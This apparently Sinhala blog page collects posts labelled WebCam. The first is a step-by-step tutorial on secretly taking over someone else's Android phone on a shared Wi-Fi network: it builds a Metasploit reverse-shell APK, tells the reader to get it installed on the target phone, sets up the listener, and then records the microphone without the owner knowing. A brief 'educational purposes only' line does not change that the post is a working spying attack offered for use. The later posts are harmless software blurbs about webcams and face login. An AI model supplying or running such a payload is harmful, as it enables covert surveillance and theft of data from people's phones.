Showing posts with label WebCam. Show all posts
Showing posts with label WebCam. Show all posts

Wifi එකේ තියෙන Android Phone එකක් Hack කරමු. (Wifi #1)

8:40 AM 1 Comment
මේ දවස් වල ඔක්කොලගේම අතේ smart phone නේ ඉතින්... අනික යන යන තැන Wifi.. Office එකෙයි ගෙදරයි හැම තැනම.. Phone කොයිවෙල්ත් Connected.. අද කියල දෙන විදියෙන් පුළුවන් යාලුවගෙ හරි තමන්ගේ හරි කාගේ හරි Phone එකක් සම්පූර්නයෙන්ම Access කරන්න.. Camera දෙකම පාවිච්චි කරලා වටේ වෙන්නේ මොනාද බලන්න පුළුවන්,  Mic  එක use කරලා අහන් ඉන්න පුළුවන්, ෆොනේ එකේ Data access කරන්නද ඕනේ එකක් කර ගත්තෙකි..
මේ method  Wifi නැතිව DATA on කරන ඉන්න වෙලාවට උනත් පාවිච්චි කරන්න පුළුවන් පොඩි පොඩි වෙනස් කම් කීපයකින්.. හැබැයි මේ Post  එකන් නම් කියන්නේ Wifi එක ඇතුලෙදි (LAN එක ඇතුලෙදි)කරගන්න විදිය..
හරි අපි බලමු කරගන්නේ කොහොමද කියලා.. ඔන්න ඉතින් කාලෙකට පස්සේ ඇත්තටම කිව්වොත් අවුරුදු 2කට පස්සේ තමා Post එකක් දාන්න හිතුනේ. බ්ලොග් එකෙත් පොඩි පොඩි වෙනස් කම් කීපයක් කරා.. මතක ඇති අපි කලිනුත් කතාකරලා තියෙනවා Backtrack, Kali Linux ගැන එහෙම.. මන් මෙකෙදි use කරන්නේ Kali Linux OS එක.. ළග නැත්තන් මෙතැන Click කරලා Download කරගන්න පුළුවන්.. මෙක Live CD එකක් විදියට use කරන්න පුළුවන් නිසා OS ගහ ගහ ඉන්න ඕනේ නැ.. නැත්තන් මන් කලින් කියලදිල තියෙනවා Virtual PC එකක් හදන හැටි.. Kali Linux එක run උනාට පස්සේ එන්නේ මේ වගේ environment එකක්...


එකේ පෙන්නලා තියෙන තැන click කරලා Terminal එක Open කරගන්න..

එකෙදි ifconfig කියන command එක use කරලා තමන්ගේ internal ip එක බලාගන්න..



තව Terminal එකක් open කරගෙන පහල command එක type කරන්න..

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R > install.apk




මේක හරියටම type කරලා තියෙන්න ඕනා..  LHOST එකේ 192.168.1.101 වෙනුවට අර කලින් බලාගත්ත තමන්ගේ ip එක add කරන්න.. දෙපාරක් check කරන්න Enter කරන්න කලින්... දැන් apk file එක ready.. කස්ටිය ඔය වගේ hack කරන software දාගෙන හොයනවා නේ.. ඔන්න දැන් අපිම එකක් හදා ගත්ත..
හරි දැන් Home folder එකේ ඇති apk file එක...



ඔය file එක upload කරලා access කරන්න ඕනේ කරන phone එකට download කරල install කරන්න.. නැත්තන් apk එක bluetooth කරන්න පුළුවන් නැත්තන් mail එකක් දාන්න.. කැමති විදියකට.. එකේදී unknown sources tic එක දාන්න අමතක කරන්න එපා..


ඊළගට තව terminal එකක් open කරගෙන type කරන්න msfconsole කියලා.. ඊට පස්සේ Enter කරන්න.. open වෙන්න ටික වෙලාවක් යයි.. එන්නේ මේ වගේ එකක්..


ඔන්න ඔය එන තැන ඉදන් තමා වැඩ පටන් ගන්නේ.. කලින් සැරේ වගේමයි.. spelling හරියට type කරන්න.. spaces හරියට තියන්න.. පහල තියෙන එක type කරලා enter කරන්න..

use exploit/multi/handler

ඊළගට set payload android/meterpreter/reverse_tcp type කරලා enter කරන්න..
ඊට පස්සේ set LHOST 192.168.1.101 type කරලා enter කරන්න අර type කරපු ip එක ඔයාලගේ ip එක වෙන්න ඕන අර apk එක හදන අවස්ථාවේදී දුන්න එක..
ඊළගට exploit කියල type කරලා enter කරන්න.. එතකොට තියෙන්නේ මේ වගේ...


දැන් අර apk එක run වෙනවා නම් හරි.. එ කියන්නේ අර user දැන් wifi එකට connect වෙලා ඉන්න ඕන..

දැන් මේ වගේ Lines දෙකක් එනවා කියන්නේ වැඩේ ගොඩ.. දැන් අර phone එකේ ඕන දෙයක් ඔයාලට කරන්න පුළුවන්.. අපි බලමු run කරන්න පුළුවන් commands ටිකක්.. ඔතන help කියල ගැහුවා නම් කරන්න පුළුවන් ඔක්කොම ටික පෙන්නනවා..
අපි උදාහරණයකට ගමු record_mic කියන එක.. ඔයාලා command එක use කරන්න දන්නේ නැත්තන් කරන්න තියෙන්න record_mic -h කියලා type කරලා enter කරන එක එතකොට පෙන්නනවා එක use කරන විදිය..
මේ වගේ ඔයාලට command එක හදාගන්න පුළුවන් දැන්...
record_mic -d 30 -f -p 
ඔන්න ඔය වගේ.. -d එකන් කියවෙන්නේ කාලය තප්පර වලින් මේකෙදි 30ක් දීල තියෙනවා.. -f කියන්නේ path එක එන විදිය ඕනේ නම් වෙනස් කරගන්න පුළුවන්.. -p වලින් කියවෙන්නේ record එක අවසානයේදී එක play වෙනවා කියන එක..
ඔන්න ඔය වගේ ඔයාලට අනිත් කෙනාගේ phone එකේ ඕනේ තරම් දේවල් කරන්න පුළුවන් එයාට දැනෙන්නේ නැති වෙන්න..
කාලෙකින් ලියපූ පලවෙනි post එක හිතුවට වඩා දිග උනා.. ඉස්සරහට නම් දිගටම post දාන බලාපොරොත්තු වෙනවා..  මොනා හරී අවුලක් අවොත් comment කරන්න.. මේක Educational Purposes only  හරිය.. කැත වැඩ කරන්න පාවිච්චි කරන්න එපා.. LAN  වලට වගේම WAN වලටත් මෙක පොඩි පොඩි වෙනස් කම් කීපයකින් පාවිච්චි කරන්න පුළුවන්.. Try කරලා බලන්න..  ඉස්සරහට computer එකක් මේ විදියට access කරන විදිය කියල දෙන්නම්...

එහෙනම් මේ Lesson එකෙන් ඔයාල මොන හරි දෙයක් ගත්ත නම්, Like එකක් Comment එකක් දාලම යන්න...

Android Mobile එකේ Camera එක Wireless Security Cam එකක් කරමු...

8:13 AM 1 Comment
Phone එකේ Cam එක PC එකට WiFi  හරහා සම්බන්ද කර ගන්න පුළුවන් නම් පට්ට නේ.. ඊට අමතරව zoom කරන්න Flasher එක on කරන්න වගේ දේවලුත් මේක හරහා කරගන්න පුළුවන්.. තව Audio එකත් අරගන්න පුළුවන්.. එ මදැයි නේ..  මේකට ඕනේ WiFi network එකක් තමා..  WiFi Network එකක් නැත්නං Mobile එකේ WiFi වලින් WiFi Hotspot එකක් හදලා එකට PC එක Connect කරගන්න..

Webcam එක Security Cam එකක් කරමු..

4:28 AM Add Comment
ඔන්න තවත් පට්ට software එකක් තමා මේක... මේකන් පුළුවන් webcam එක security cam එකක් වගේ use කරන්න... මන් webcam එකත් එක්ක දගලනවා වැඩි වගේ නේද...  බඩුවකින් ගන්න පුළුවන් උපරිම ප්‍රයෝජන අපි ගන්න එපයි නේද... :D කොහොම හරි මේ software එකෙත් වැඩ කැලි ගොඩයි... Motion detection, Image snapshots, Ftp-upload, Password protection, Built-in web server අරව මේවා  ගොඩයි... මන් නම් වැඩියෙන්ම කැමති Motion Detection එකට.. එකෙන් වෙන්නේ cam එකෙන් පෙන හරියේ මොකක් හරි සෙලවීමක් උනොත් අපිට දන්වන එක... 

Password ගහපු කාලේ ඉවරයි... දැන් Face Recognition..

6:42 AM Add Comment
අදත් ආවා ඔන්න සුපිරි Software කැල්ලක් අරගෙන.. PC එකට ලොග් වෙනකොට password ගහන්නේ නැතුව මුණ පෙන්නලා ලොග් වෙන්න තිබ්බ නම් පොඩි ගතියක් තියෙනවා නේද.. ඔය Films වල එහෙම තියෙන්නේ.. අන්න ඇහෙම gadget එකක් ගැන විස්තරයක් තමා අද කියන්න යන්නේ... මේකට නම් ඉතින් webcam එකක් තියෙන්නම ඕනේ.. Laptop එකක නම් inbuilt එනවා නේ ඒවාට උනත් අවුලක් නැ...

එළකිරි වගේ WebCam Software එකක් දෙන්නද....

6:30 AM Add Comment


මේක ආයේ නිකන් ගින්දර වගේ webcam සොෆ්ට්වෙයාර් කැල්ලක්.. ගොඩක් option තියෙනවා මේකේ.. අපේ background එකට Images දාන්න පුළුවන් හරියට ග්‍රීන් ස්ක්‍රිරීන් ටෙක්නොලොජි එක වගේ.. මේක Virtual WebCam  එකක් නිසා අපිට ඕනේ ඕනේ Effect  එහෙම දෙන්න පුළුවන්.. තව මේකේ HD ත් support.. තව IP Based Webcam  එකක් උනත් දෙන්න පුළුවන්... Application දෙක තුනකට එක පාර වෙබ් කැම් දෙන්නත් එක  පුළුවන්.. Zoom කරන්න පුළුවන්, අපේ ඩෙස්ක්ටොප් එක අනිත් කෙනාට පෙන ව්දියට දෙන්නත් පුළුවන්..